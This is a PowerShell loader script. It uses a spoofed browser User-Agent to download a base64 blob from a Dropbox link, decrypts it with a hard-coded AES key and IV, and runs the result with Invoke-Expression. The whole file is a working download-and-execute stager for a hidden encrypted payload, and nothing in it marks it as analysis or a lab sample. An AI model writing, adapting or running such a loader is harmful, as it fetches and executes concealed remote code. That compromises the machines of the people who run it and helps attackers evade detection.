function D {
    param($e, $k, $i)
    $a = [System.Security.Cryptography.Aes]::Create()
    $a.Key = $k
    $a.IV = $i
    $a.Padding = "PKCS7"
    $d = $a.CreateDecryptor()
    $b = [Convert]::FromBase64String($e)
    $m = New-Object IO.MemoryStream
    $c = New-Object Security.Cryptography.CryptoStream($m, $d, 'Write')
    $c.Write($b, 0, $b.Length)
    $c.Close()
    [Text.Encoding]::UTF8.GetString($m.ToArray())
}

$k = [Convert]::FromBase64String("Q3K1OxDixc03IRcJusRx7mbJX15GuNORMw2PuFevUfA=")
$i = [Convert]::FromBase64String("kXHMQaoW9ayabOL5BKBI3w==")

try {
    $url = "https://www.dropbox.com/scl/fi/sosp2ngt2w9a6uyctydu3/text?rlkey=ccq3fqli274hl0oc1nmitvq4z&st=4lkf2c62&dl=1"
    $headers = @{ "User-Agent" = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" }
    $raw = iwr $url -UseBasicParsing -Headers $headers
    $p = $raw.Content -replace '[^a-zA-Z0-9+/=]', ''
    $s = D $p $k $i
    iex $s
} catch {
    Write-Error "[-] Failed to fetch or execute encrypted payload: $_"
}
